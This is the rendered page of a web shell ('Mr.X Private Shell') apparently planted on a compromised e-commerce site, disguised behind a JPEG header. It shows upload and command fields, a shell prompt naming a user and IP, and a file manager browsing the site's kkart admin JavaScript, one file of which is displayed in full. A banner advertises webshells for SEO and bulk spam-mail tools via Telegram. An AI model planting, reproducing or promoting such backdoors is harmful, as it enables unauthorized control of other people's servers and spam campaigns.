����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
jQuery( function ( $ ) {

	// Run tipTip
	function runTipTip() {
		// Remove any lingering tooltips
		$( '#tiptip_holder' ).removeAttr( 'style' );
		$( '#tiptip_arrow' ).removeAttr( 'style' );
		$( '.tips' ).tipTip({
			'attribute': 'data-tip',
			'fadeIn': 50,
			'fadeOut': 50,
			'delay': 200,
			'keepAlive': true
		});
	}

	runTipTip();

	// Allow Tabbing
	$( '#titlediv' ).find( '#title' ).keyup( function( event ) {
		var code = event.keyCode || event.which;

		// Tab key
		if ( code === '9' && $( '#kkart-coupon-description' ).length > 0 ) {
			event.stopPropagation();
			$( '#kkart-coupon-description' ).focus();
			return false;
		}
	});

	$( '.kkart-metaboxes-wrapper' ).on( 'click', '.kkart-metabox > h3', function() {
		$( this ).parent( '.kkart-metabox' ).toggleClass( 'closed' ).toggleClass( 'open' );
	});

	// Tabbed Panels
	$( document.body ).on( 'kkart-init-tabbed-panels', function() {
		$( 'ul.kkart-tabs' ).show();
		$( 'ul.kkart-tabs a' ).click( function( e ) {
			e.preventDefault();
			var panel_wrap = $( this ).closest( 'div.panel-wrap' );
			$( 'ul.kkart-tabs li', panel_wrap ).removeClass( 'active' );
			$( this ).parent().addClass( 'active' );
			$( 'div.panel', panel_wrap ).hide();
			$( $( this ).attr( 'href' ) ).show();
		});
		$( 'div.panel-wrap' ).each( function() {
			$( this ).find( 'ul.kkart-tabs li' ).eq( 0 ).find( 'a' ).click();
		});
	}).trigger( 'kkart-init-tabbed-panels' );

	// Date Picker
	$( document.body ).on( 'kkart-init-datepickers', function() {
		$( '.date-picker-field, .date-picker' ).datepicker({
			dateFormat: 'yy-mm-dd',
			numberOfMonths: 1,
			showButtonPanel: true
		});
	}).trigger( 'kkart-init-datepickers' );

	// Meta-Boxes - Open/close
	$( '.kkart-metaboxes-wrapper' ).on( 'click', '.kkart-metabox h3', function( event ) {
		// If the user clicks on some form input inside the h3, like a select list (for variations), the box should not be toggled
		if ( $( event.target ).filter( ':input, option, .sort' ).length ) {
			return;
		}

		$( this ).next( '.kkart-metabox-content' ).stop().slideToggle();
	})
	.on( 'click', '.expand_all', function() {
		$( this ).closest( '.kkart-metaboxes-wrapper' ).find( '.kkart-metabox > .kkart-metabox-content' ).show();
		return false;
	})
	.on( 'click', '.close_all', function() {
		$( this ).closest( '.kkart-metaboxes-wrapper' ).find( '.kkart-metabox > .kkart-metabox-content' ).hide();
		return false;
	});
	$( '.kkart-metabox.closed' ).each( function() {
		$( this ).find( '.kkart-metabox-content' ).hide();
	});
});

Filemanager

Name Type Size Permission Actions
api-keys.js File 3.82 KB 0644
api-keys.min.js File 2.15 KB 0644
backbone-modal.js File 3.48 KB 0644
backbone-modal.min.js File 2.19 KB 0644
kkart-clipboard.js File 858 B 0644
kkart-clipboard.min.js File 327 B 0644
kkart-enhanced-select.js File 9.05 KB 0644
kkart-enhanced-select.min.js File 5.24 KB 0644
kkart-orders.js File 1.94 KB 0644
kkart-orders.min.js File 1.13 KB 0644
kkart-product-export.js File 3.54 KB 0644
kkart-product-export.min.js File 1.93 KB 0644
kkart-product-import.js File 2.58 KB 0644
kkart-product-import.min.js File 1.45 KB 0644
kkart-setup.js File 10 KB 0644
kkart-setup.min.js File 6.37 KB 0644
kkart-shipping-classes.js File 7.96 KB 0644
kkart-shipping-classes.min.js File 4.46 KB 0644
kkart-shipping-zone-methods.js File 15.1 KB 0644
kkart-shipping-zone-methods.min.js File 8.52 KB 0644
kkart-shipping-zones.js File 8.92 KB 0644
kkart-shipping-zones.min.js File 4.74 KB 0644
kkart_admin.js File 13.45 KB 0644
kkart_admin.min.js File 8.07 KB 0644
marketplace-suggestions.js File 15.54 KB 0644
marketplace-suggestions.min.js File 6.11 KB 0644
meta-boxes-coupon.js File 1.98 KB 0644
meta-boxes-coupon.min.js File 1.15 KB 0644
meta-boxes-order.js File 45.57 KB 0644
meta-boxes-order.min.js File 27.96 KB 0644
meta-boxes-product-variation.js File 32.37 KB 0644
meta-boxes-product-variation.min.js File 17.56 KB 0644
meta-boxes-product.js File 21.64 KB 0644
meta-boxes-product.min.js File 13.13 KB 0644
meta-boxes.js File 2.47 KB 0644
meta-boxes.min.js File 1.71 KB 0644
network-orders.js File 2.29 KB 0644
network-orders.min.js File 1.19 KB 0644
product-ordering.js File 2.25 KB 0644
product-ordering.min.js File 1.47 KB 0644
quick-edit.js File 6.73 KB 0644
quick-edit.min.js File 4.33 KB 0644
reports.js File 6.31 KB 0644
reports.min.js File 3.17 KB 0644
settings-views-html-settings-tax.js File 11.98 KB 0644
settings-views-html-settings-tax.min.js File 6 KB 0644
settings.js File 5.36 KB 0644
settings.min.js File 3.55 KB 0644
system-status.js File 3.49 KB 0644
system-status.min.js File 1.92 KB 0644
term-ordering.js File 4.17 KB 0644
term-ordering.min.js File 2.19 KB 0644
users.js File 3.76 KB 0644
users.min.js File 1.84 KB 0644